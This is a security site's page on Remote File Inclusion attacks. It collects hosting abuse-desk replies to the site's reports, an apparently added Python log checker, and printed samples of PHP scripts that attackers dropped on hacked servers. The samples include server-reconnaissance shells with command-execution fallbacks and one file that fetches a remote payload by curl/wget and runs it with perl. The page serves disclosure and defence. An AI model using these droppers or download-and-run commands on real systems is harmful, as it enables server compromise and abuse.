Edaìn Works :: Trying to clean the Web since August 2001...

Webmaster:
Vincent Graux (VGR)
View Vincent Graux's profile on LinkedIn

One month of sysops taking our alerts into account

Welcome to our Remote File Inclusion special page :/

Contents: sample of files deposited on exploited servers | list of vulnerable server software | new 2010-03-04: Fx29, Fx29ID, FX29SHEXEC files (usually fx29id2.php) | new 04/09/2008 update
Customer has been informed and the site has been taken offline. Thank you for reporting this issue. We trust that we have informed you sufficiently with this. Dennis Koster Manager Linux Hosting Solutions Denit Hosting Solutions support@denit.nl 30/05/2008 10:23
Hello, Thank you very much for the information. I have terminated the site immediately. [...]The account has been blocked. Thank you for the assistance in this matter. Best Regards, Syman / Kevin J. 100webspace.com support@100webspace.com 31/05/2008 09:13 / 28/08/2008
account suspended, thanks :-) Best Regards Gary DELOBEL Support EBSD EBSD - Web Hosting gary.delobel@ebsd.net 31/05/2008 10:49
Dear, Our customer has been informed and will take appropriate action. With kind regards, Tymen Fox CTO TrancePitt Internet info@trancepitt.com 31/05/2008 16:03
Hi, The issue has been taken care of and we removed some malicious script from the server. Thank you for notifying the same. Regards, Ashok Slash Support.com mi-globatsupport@slashsupport.com 24/05/2008 16:56
Hello! Thank you for your report. We will take all appropriate steps to prevent these attacks. Please, feel free to notify us in future. Evgeny Fadeev Support Division "Demos-Internet" abuse@demos.ru 03/06/2008 11:14
Dear Sir or Madam, Thank you for your Message! We have contacted our customer, and informed him about this security issue so that he can fix it. with best regards, UPC Abuse Team. UPC Austria Ges.m.b.H. abuse@upc.at 03/06/2008 12:53
Greetings, The administrator of this dedicated server has been warned and is currently working to solve this problem. Regards, -- Nicolas LAFONT SIVIT Sarl | Internet hosting - IP transit http://sivit.fr 03/06/2008 13:05
Hello, This user has been issued a 1h warning to stop the offending actions. [...] This user's server has been suspended. Thank you for this report, we appreciate the cooperation. Let us know if we can do anything else. Toni A. HostForWeb Support abuse@hostforweb.com 04/06/2008 08:35 / 26/08/2008
Yes, some dork abused a php-website. We have killed the processes and informed the customer. [...] There was a hacked website on this server. The page was fixed on the 6.6.2008. If you still see attacks please report again. Nine Internet Solutions AG abuse@nine.ch 06/06/2008 10:42
Hi, We are taking care of it right now. We already took action yesterday. Let us know if the attack persists or repeats. Thank you for reporting this situation. abuse@73dpi.com 06/06/2008 15:38
Dear Sir, we will try our best to find out who is responsible for the abuse. Thanks for your help. [...] Dear Sir, I have admonished the responsible party, inviting them to make correct use of the Internet resources. Thank you for your collaboration in notifying us of the abuse. [...] Your report was registered; due disciplinary measures regarding our customer are on the way. Meanwhile, please accept our apology for your trouble. Best Regards Servizio Abuse Tiscali Tiscali Italia S.p.A. [alice.it] abuse@tiscali.it 06/06/2008 07:24 / 23/07/2008
Hi, Thanks for contacting us, We've informed the server owner and necessary actions will be taken to avoid this to happen. Best Regards, Milind P Support Technician II Defender Technologies Group, LLC./PowerVPS Support abuse@defenderhosting.com 07/06/2008 07:13
Dear Sir / Madam! We are now investigating this incident and will do our best to prevent any future abuse of this kind from our network. We are always ready to stop any abuse so please do not hesitate to contact us if any additional assistance is ever required. Thank you for cooperation! .masterhost.ru abuse@masterhost.ru 11/06/2008 02:11
This matter will be resolved with our customer. Thanks for the information. Best regards, -- Kind regards, Remko Kleijkers Network Engineer - Unilogic Networks B.V. abuse@unilogicnetworks.net 12/06/2008 09:09
Greetings, We are looking into this issue and trying to find the culprit. It is a shared webserver so it might take us a while to sort through the non-malicious content. But rest assured, we are working on it. Best regards Mats Webcows Backoffice abuse@dependit.se 13/06/2008 20:59
You should not see any more of these. Please let us know if you do. Chris Jackman RCN Internet Systems Abuse Desk abuse@rcn.com 13/06/2008 23:08
We have made the servers unavailable to the public, and are working with our client to resolve. Thanks for reaching out. Gregg Kitaeff VP of Sales Logicworks gk@logicworks.net 16/06/2008 17:30
Hi Thank you for your email. We have investigated the compromised server and identified and corrected the exploited script. We have identified a number of third party servers which were used to stage the original attack against one of our customers' sites and are in the process of reporting this abuse to their owners. Thank you again for bringing this to our attention. Regards opendium.net (HOSTIT-KCOM) h.mills@opendium.com 19/06/2008 10:45
Dear Sir / Madam, Thank you for writing into us. The server in question has been disabled. Thank you for your information. [...] Thank you for writing into us. We have disabled the IP address 91.186.1.118. Do let us know if we can help you more. Regards, Nick G Chief Quality Analyst http://eukhost.com 20/06/2008 04:05
Hi, Thanks for your email letting us know of the issue. I have now taken the machine in question offline and passed the issue to colleagues. I hope this hasn't been too much of an issue for you. [...] I have forwarded this matter on to the relevant parties and they tell me that the server in question has been taken offline pending an investigation and as such, this attack should have stopped. [...] To all concerned; I believe we have traced the cause of this issue to an out of date vBulletin installation which has now been patched. The server has been scanned for root-kits and other nasties and appears to be clean. Please do let us know if you receive any more attacks from our server and we will investigate it further. Regards, rich@genericlan.net abuse@racksrv.net 21/06/2008 13:03
Hello! I removed this site. Regards. Bordák János info@ingyenweb.hu (pokol.hu) 21/06/2008 19:01
Hello, The client has been issued an abuse notice. When he replies, we will check the security on his VPS and resolve this situation. If we don't hear from him soon, the server will be suspended. Let us know if you have further questions. [...] Greetings I have suspended the account, and it will not be activated again until the bot has been removed and the outdated/exploitable script has been removed from the server. Thanks, [...] Best regards, Zlatko D. / Nathan S. HostForWeb Support / Level 2 Support abuse@hostforweb.com 23/06/2008 09:14 / 22/07/2008
Hello, thank you for the information. We have informed our customer about this security issue. Best regards from Germany. Customer Care [netclusive] internet broadcasting GmbH support@netclusive.de 23/06/2008 16:26
Dear Sir, we have taken measures against these attacks. Thank you for your warning. regards, Mustafa Aldemir m_aldemir@tilda.com.tr [for http://www.bes.org.tr] 26/06/2008 10:20
Thanks, The source of the attack was an exploit on the site forums.svucrib.com. The site has been removed. Feel free to remove our IP from your firewall. Regards, Jarrad Piper Big Button Internet. sysadmin@bigbutton.com.au 26/06/2008 10:14
Hi, We have removed the malicious script found in the server and also removed the infected php scripts from your domain. Please feel free to contact for further assistance. kind regards, Neil support@mdwebhosting.com.au [CC:abuse@dichotomy.com.au] MD Web Hosting 27/06/2008 04:04
Hello, Thank you for reporting this abuse. We have removed the account responsible. Spry Abuse Team abuse@spry.com 01/07/2008 07:35
Good This issue is under investigation Gustavo Tayupo. Technical Support Department Analyst. Private IP Services, C.A. abuse@iguanahosting.com [CC:abuse@PRIVATEIPSERVICES.COM] 29/06/2008 18:10
Thanks for reporting this issue. We are looking into this together with the customer of this server. Kristian -- Kristian H. DataGuard AbuseTeam abuse@dataguard.no 02/07/2008 10:12
Hello, the malware script has been killed and deleted so the attack should have stopped. Regards, Abuse Team Hostalia Internet www.hostalia.com abuse@hostalia.com [CC:abuse@globalcare.or.kr] 03/07/2008 10:14
Hello, Thanks for the head's up! The offending account (redsraiders.com, hosting the file for injection) has been deactivated, pending review. If we can be of further assistance, please do not hesitate to ask. Cade Ekblad-Frank Level 3 Support Bluehost.com abuse@bluehost.com 06/07/2008 19:28
Hello, I have forwarded this to our customer to investigate the server. As a company which sells dedicated root servers we can't do this ourselves. To stop the attacks I have now blocked this IP on our side until the issue is solved. Best regards Kai Doelter netdirekt e. K. Germany info@netdirekt.de 11/07/2008 08:57
????????????! Thank you for information. Account blocked [...]the attack source has been blocked ? ?????????, ???????? ?????? abuse@hc.ru [for s15219733.onlinehome-server.info] 11/07/2008 12:23 / 23/07/2008
Account removed. T35 Hosting, Inc. http://www.t35.com 15/07/2008 04:17
Hello, we should now have stopped the Attacks from our Server. Could you agree with it? roquette@speedbone.de [for prosite.de (DE-SPEEDBONE-217-13-199#0-63)] 16/07/2008 21:47
Dear Sirs The specified users and their content were disabled as requested. Regards, Carlos Arce *@xpg.com.br [for http://avast4ever.xpg.com.br] Xpg Extreme WebHosting 18/07/2008 17:51
The EC2 customer says he has secured his instance from hackers by applying a security patch. You should no longer see any further attacks from 75.101.157.249. If you do see any more attacks, please let me know. Thanks, Marty Amazon AWS EC2 Abuse ec2-abuse@amazon.com 22/07/2008 20:20
Hello, I have addressed this for now and found the site causing these problems on the server. Thank you for letting us know about this, we appreciate the heads up any time someone is willing to inform us of this type of behavior. Please let us know if you have any additional questions or concerns. Michael Piekarski http://www.HostMySite.com support@HostMySite.com 24/07/2008 04:30
Thank you for your signal. Our user has been strongly warned. Account (www.printunion.ru, IP 217.23.156.220) temporarily blocked until we investigate the deviant activity of our user. Oleg Goryun support@caravan.ru [for printunion.ru (CARAVAN-HOSTING-NET-4)] 31/07/2008 19:00
Thanks, your email helped us to find a neglected server, which was abused by a Romanian hacker. I hope we have stopped him. Josef Liska jl@chl.cz [for 193.85.215.9 (CHL-POCITACE-CZ)] 25/08/2008 13:09
Hello, Thank you for contacting us about this issue. I've located the customer on the server whose site appears to have been exploited, and they should be upgrading their software shortly. As a security measure, I've blocked calls to id.txt and agent libperl-www from this server, as we have this blocked already on other servers. Note that this can still allow the hack attempts to be executed, but they will not be successful. If you see further attempts like this, pay attention to the error code reflected in the logs to see if it is a '406' or '403' status, which indicates that the attempt was made but blocked by our server. Thanks, Vanessa InMotion Hosting System Administration abuse@inmotionhosting.com 24/05/2008 18:38
Hello, We have implemented a block within our firewall ruleset to prevent this attack. If we can be of more assistance, please contact us. Thank you Anthony K W. abuse@ecommerce.com [for opentransfer.com (ECOMMERCE-HOSTING)] 31/08/2008 04:51
Dear security@edainworks.com, We wish to thank you for your message in which you informed us about an incident with our Internet service. This IP Address (202.6.233.40 - cherry.padinet.com) is one of our Hosting Servers. Most likely what occurred here is that one of our customers with an outdated PHP script installation was exploited and their account was used to run these hack attempts. Now the problem has been resolved; I have killed any abnormal processes and additionally scanned the server for viruses and removed all infected files. I also checked the server for any potential exploit processes and didn't find any running at the moment. If you have any further issues with this IP address please let us know and we'll look further into the matter. Best Regards, PadiNET Hostmaster hostmaster@padinet.com 03/09/2008
Dear Sir or Madam, We hereby inform you that the complaint you submitted to us for "hacking" has been handled by our services. Practically this means that should the abuser be a Belgacom customer, he/she would then be requested to certify that he/she will stop committing such abuses. And should this person go against our terms again, more serious actions would then be taken. Do not hesitate to contact us for questions or problems regarding our competences. Yours truly, Internet Fraud Team INS/SEC BELGACOM [for .adsl-static.isp.belgacom.be] abuse@skynet.be 03/09/2008

The Terra Abuse Department has the constant preoccupation of keeping a safe and friendly network. We appreciate your efforts in helping us to fight against the bad use of the Internet through the Terra servers. About your claim, the referred improper content was removed and the person responsible for making it available at the "Páginas Pessoais" was identified as a TERRA ISP USER and had their services SUSPENDED. We point out that this user will be guided about the norms of security and good behavior in Internet utilization and, in case a relapse occurs, the contract will be terminated. Emerson Rocha Terra Networks Brazil S/A abuse@terra.com.br Abuse Department - Security Team 24/05/2008 18:38
Hello, No, its not an error. Sadly, you are correct. That is our IP address, and the server that it belongs to was compromised. We became aware of this last week, and the problem *should* have been resolved by now. When was the last attempt that you saw coming from this server? Ian Lindsay Technical Support Technician CrystalTech Web Hosting, Inc. A Newtek Business Services Company URL: http://www.crystaltech.com 24/05/2008 09:50
Hello, This is one of our shared servers. Most likely what occurred here is a customer with an outdated PHP script installation was exploited and their account was used to run these hack attempts. We usually catch these within a few hours of the time the account was exploited, however, so this issue should not still be occurring. I also checked the server for any potential exploit processes and didn't find any running at the moment. If you have any further issues with this IP address please let us know and we'll look further into the matter. Thank You! Dragos Gabriel Fedorovici JSA I - System Administrator Team support@lunarpages.com 24/05/2008 09:22
Good, the problem has been resolved; security rules were added to the Apache server to counter this type of attack. Additionally the server was scanned for viruses and all infected files were removed. Thanks for your collaboration. Gustavo Tayupo. Technical Support Department Analyst. Private IP Services, C.A. Headquarter: CC Plaza Mayor Local 6B229 23/05/2008 16:12
Dear sir: We wish to thank you for your message in which you informed us about an incident with our Internet service. In addition, we would like to inform you that we are taking measures to approach the problem in order to prevent it from happening again in the future. We are grateful for your message, and we remind you that you can contact us at email nemesys@telefonica.es or abuse@telefonica.net I. Martinez Nemesys Abuse Team rima-tde.net Admin Group Telefónica De España 21/05/2008 20:17
Thank you for your Message! We have contacted our customer, and informed him about this security issue so that he can fix it. with best regards, UPC Abuse Team. UPC Austria Ges.m.b.H. Center Ost, St.Peter Guertel 10b A-8042 Graz U: http://www.upc.at E: abuse@upc.at 21/05/2008 11:58
We suspended the account running such software and we will investigate this problem with its owner. Regards, Maciej Tomaszewski biuro@xon.pl 19/05/2008 14:47
Thank you for the information. The user has been warned and informed about the situation. marlena.niezorawska@superhost.pl 19/05/2008 09:24
Dear Sir, Thank you for your message. I can confirm that a user account on this server was indeed compromised and was implicated in this attack. We are currently cleaning up the machine and identifying the vulnerability so any future recurrence can be avoided. Thanks again for bringing this to our attention. Cheers, Maarten Daemon.be 18/05/2008 19:13
Thanks, we'll look in to it. Someone probably has a vulnerable PHP app on their site we'll track down. Thank you, Jen Hostasaurus Support support@hostasaurus.com 17/05/2008 17:30
Thank you, this account has been terminated. Jamie help@ripside.com 13/05/2008 16:03
Dear Sir(s), The registrations/services of the users in question have been deactivated. Sincerely, Carlos Arce carce@xpg.com.br Xpg Extreme WebHosting Tue, 13 May 2008 01:17:00 +0200
Hi, we killed the abnormal processes. Thank you for reporting. We remain at your disposal for further clarification. Kind regards Christian Cantinelli Technical Senior Engineer Serverplan Srl - supporto@serverplan.com 12/05/2008 10:27
Hello, We have located a few Perl scripts inside the reseller hosting account. They have been locked down. Can you check and let us know if you see any more of such attacks from our server ? We apologize for the inconvenience caused. -- Thank You Swapneel Patnekar Senior Systems Engineer http://www.networkredux.com 10/05/2008 22:58
Hello, Thank you for notifying us of this. I've forwarded your email to our customer to have him take a look into this. It doesn't appear to be him that is trying to hack your server, but rather a third party exploiting a security problem in his site. We will follow up with him to see that this issue is resolved and doesn't happen again. Thank you, Vanessa InMotion Hosting vanessav@inmotionhosting.com 10/05/2008 20:21
Hello, we blocked this host, thanks for your report. support@caravan.ru 10/05/2008 19:47
Dear Sir or Madam, thank you for the information. We have immediately contacted our customer and asked him to take care of the problem. If you have any further problems with this IP or this server, please just get in touch again briefly. Please excuse the inconvenience. Best regards Julian Weinberger Hetzner Online AG Stuttgarter Straße 1 91710 Gunzenhausen Tel: 09831 61006-1 Fax: 09831 61006-2 julian.weinberger@hetzner.de http://www.hetzner.de 08/05/2008 09:55
Dear Sir, we will try our best to find out who is responsible for the abuse. Thanks for your help. Best Regards Servizio Abuse Tiscali Tiscali Italia S.p.A. abuse@tiscali.it 05/05/2008 18:08
It is just the other way round: your server made HTTP requests to www.europeanexperts.org and *****_utilities.php. Just as if someone had been browsing websites from your server with a browser. Given that this is a Linux/FreeBSD server, 99.99% of the time it is a process running on the server that was put there by a hack. So this notification indicates that your server has probably been hacked. -- Kind regards, Martijn Smit ProServe B.V. Nieuwlandparc 155 3351 LJ Papendrecht Postbus 363 2950 AJ Alblasserdam Tel: 078 692 2222 Fax: 078 692 2269 http://www.proserve.nl 05/05/2008 11:14
DALnet has now disabled this channels website. ahnberg@dal.net 05/05/2008 08:33
Hello, The DL00*** machine is a machine rented by one of our customers. We temporarily disabled their account until they get back to us and clarify these security concerns. Masoch is a production server with a few hundred accounts so tracking the account with that problem takes a bit more time. We found a few exploited accounts on that machine and secured them and we will continue looking over this. Thank you for bringing these important notes to our attention. Have a good day ! Florin - Iulian Asavoaie System Admin Team support@lunarpages.com 02/05/2008 21:54
Hello! I removed this site. Bordák János info@ingyenweb.hu 02/05/2008 14:27
Hello, Thank you for informing us about the attacks. We found the vulnerable site and closed it. ( Very old version of PHP-Nuke :( ) Best Regards. Goktug OZTURK 2008/5/2 InternetSahibi.Net Int. mail@internetsahibi.net hostum@hostum.net 02/05/2008 13:24
We did some traces on appserv and the ips you gave us and happened upon some files in /tmp that were owned by the exploited website. We looked into that website and found an old version of Acal (calendar program) which had a perl script within it that was connecting to IRC and seemed heavily optimized toward searching a variety of popular web search engines and giving the results back through an IRC interface. We chmod'd 000 that dir and alerted the website owner they need to update their Acal software. Once again, thank you for the heads up. Thanks, Dave Carnahan ZeroLag Communications E-mail: support@zerolag.com Web: http://www.zerolag.com/ 30/04/2008 22:09
The Tripod account you have brought to the attention of the Lycos Network Abuse Department was found to be in violation of our Terms and Conditions. As a result, it has been removed from our servers. Thank you for reporting it to us. Bill Customer Service Lycos Services. support@support.lycos.com 28/04/2008 16:42
Hi, We have forwarded this abuse report to our downstream, we will wait for their response and keep you updated. Thank you. Regards, Mike C. PIRADIUS NETWORK C-G-19, SME Technopreneur Center Cyberjaya 2270 Jalan Usahawan 2 63000 Cyberjaya Selangor, Malaysia Email: abuse@piradius.net Website: http://www.piradius.net 28/04/2008 11:28
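Several of the replies above describe what the attacker's traffic looked like from the hosting side: a request whose parameter is itself a URL to one of the dropped files, the libwww-perl fetching agent (written "libperl-www" in the InMotion reply) and, when a server-side rule caught it, a 403/406 in the log. The following added example (not code from this page or from edainworks.com) turns those indicators into a small Apache log checker; the log lines inside it are constructed with documentation IP addresses, and the file names come from the sample list further down this page.

```python
"""Flag Remote File Inclusion (RFI) attempts in Apache combined-format logs.

Indicators used, all taken from what this page documents:
  * a request parameter whose value is itself a URL: the remote file the
    vulnerable include() will fetch, usually with a trailing "?" so that
    whatever the script appends becomes a harmless query string;
  * the names of the files attackers dropped (id.txt, fx29id2.php, r57.txt ...);
  * the libwww-perl user agent used by the fetching bots;
  * a 403/406 status, which marks an attempt the web server refused.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# File names of the dropped samples shown on this page (lower-cased).
DROPPED_NAMES = {
    "id.txt", "nid.txt", "id2.txt", "arab.txt", "cmdasc.txt", "oldbisok.txt",
    "sistem.txt", "safeon.txt", "r57.txt", "fx29id2.php",
}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
BLOCKED_STATUS = {"403", "406"}


def rfi_indicators(target, ua):
    """Return the list of RFI indicators found in one request target and UA."""
    found = []
    # keep_blank_values so "page=http://x/id.txt?" keeps its trailing "?" value
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            found.append("remote-url-in-param:" + name)
            fname = urlsplit(value).path.rsplit("/", 1)[-1].lower()
            if fname in DROPPED_NAMES:
                found.append("known-dropper:" + fname)
    if "libwww-perl" in ua.lower():
        found.append("ua:libwww-perl")
    return found


def outcome(status):
    """Classify what the server did with the request by its status code."""
    if status in BLOCKED_STATUS:
        return "blocked"        # attempt made, refused by the server rules
    if status.startswith("2"):
        return "served"         # the include may well have executed
    return "other"


def analyse_log(lines):
    """Parse log lines and return one finding per request showing RFI signs."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        indicators = rfi_indicators(m["target"], m["ua"])
        if indicators:
            findings.append({
                "ip": m["ip"], "status": m["status"],
                "outcome": outcome(m["status"]),
                "target": m["target"], "indicators": indicators,
            })
    return findings


# Constructed sample lines (documentation IPs), not a real capture.
SAMPLE_LOG = """\
203.0.113.7 - - [24/May/2008:18:31:02 +0200] "GET /index.php?page=http://192.0.2.10/id.txt? HTTP/1.1" 200 1843 "-" "libwww-perl/5.805"
203.0.113.7 - - [24/May/2008:18:31:05 +0200] "GET /modules.php?name=http://192.0.2.10/fx29id2.php? HTTP/1.1" 406 385 "-" "libwww-perl/5.805"
198.51.100.4 - - [24/May/2008:18:32:10 +0200] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [24/May/2008:18:33:41 +0200] "GET /index.php?page=ftp://192.0.2.10/r57.txt HTTP/1.1" 403 291 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ip']} {f['status']} {f['outcome']:8} {f['target']}")
        print("    " + ", ".join(f["indicators"]))
```

A "served" finding is the one worth chasing: it means the include target was fetched with a 200, so the hosting side should look for the dropped file's output or an IRC bot process, as the replies above did.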

Non-exhaustive list of vulnerable software parts...
On the abused (middle) server:
On the exploited (third-party) server:

Simple sample of files dropped on compromised (third-party) servers:
New 2010-03-04: Fx29
<?php
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P   = @getcwd();
$IP  = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "<br>"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
  if (enabled("exec")) { exec($cmd,$o); $rez = join("\n",$o); }
  elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
  elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }  
  elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096);  } pclose($h); }
  else { $rez = "Error!"; }
  return $rez;
}
function vsize($size) {
  if (!is_numeric($size)) { return FALSE; }
  else {
    if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
    elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
    elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
    else { $size = $size . " B"; }
    return $size;
  }
}
function hdd($type) {
  $P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
  $hddspace = array("total" => vsize($T), "free"  => vsize($F), "used"  => vsize($U));
  return $hddspace[$type];
}
die("FeeLCoMz");
?>
That script isn't even correctly coded (see the final $U = $T - $U instead of $U = $T - $F ;-)),
and the server details it outputs are not very interesting, but disclosing them to a remote attacker is still an annoyance ;-)
Here's the output:
ID: FeeLCoMz
SAFE: OFF
OS: WINNT
UNAME: Windows NT ***somename*** 5.1 build 2600
SERVER: 127.0.0.1
USER: SYSTEM
UID: uid=0 gid=0
DIR: ***somedir***
PERM: [W]
HDD: Used: 4.01 GB Free: 1.26 GB Total: 4.01 GB
DISFUNC:
FeeLCoMz
arab.txt
<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
   
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
                           
}

echo "kangkung<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
nid.txt
<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
} 
cmdAsc.txt
<? 

/*******************************************\
 IRC.ASCNET.BIZ  
 http://www.asc.sh/        
 ALBOSS PARADISE aka ASCRIMEZ aka ASCNET aka ASC aka ALBANIAN.SECURITY.CLAN 
\*******************************************/

$x16="get_current_user"; //unobfuscated :  $x16="get_current_user";
$x17="getcwd"; // $x17="getcwd";
$x18="getenv"; // $x18="getenv";
$x19="gethostbyname"; // $x19="gethostbyname";
$x1a="php_uname"; // $x1a="php_uname";
$x1b="phpversion"; // $x1b="phpversion";
$x1c="system";  // $x1c="system";
echo "ALBANIA<br>"; // echo "ALBANIA<br>";
$x0b = @$x1a();
$x0c = $x1c(uptime);
$x0d = $x1c(id);
$x0e = @$x17();
$x0f = $x18("SERVER_SOFTWARE"); // $x0f = $x18("SERVER_SOFTWARE");
$x10 = $x1b();
$x11 = $_SERVER['SERVER_NAME'];
$x12 = $x19($x13);
$x14 = $x16();
$x15 = @PHP_OS;
echo "os: $x15<br>"; // echo "os: $x15<br>";
echo "uname -a: $x0b<br>"; // echo "uname -a: $x0b<br>";
echo "uptime: $x0c<br>"; // echo "uptime: $x0c<br>";
echo "id: $x0d<br>"; // echo "id: $x0d<br>";
echo "pwd: $x0e<br>"; // echo "pwd: $x0e<br>";
echo "user: $x14<br>"; // echo "user: $x14<br>";
echo "phpv: $x10<br>"; // echo "phpv: $x10<br>";
echo "SoftWare: $x0f<br>"; // echo "SoftWare: $x0f<br>";
echo "ServerName: $x11<br>"; // echo "ServerName: $x11<br>";
echo "ServerAddr: $x12<br>"; // echo "ServerAddr: $x12<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>"; // echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>
oldbisok.txt
<?php
echo exec('cd /tmp;curl -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo exec('cd /tmp;curl -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo system('cd /tmp;curl -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo shell_exec('cd /tmp;curl -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo exec('cd /tmp;wget -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo exec('cd /tmp;wget -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo system('cd /tmp;wget -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo shell_exec('cd /tmp;wget -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
?>

<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir); 

if ($free === FALSE) {$free = 0;} 

if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}} 

exit;

sistem.txt
<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
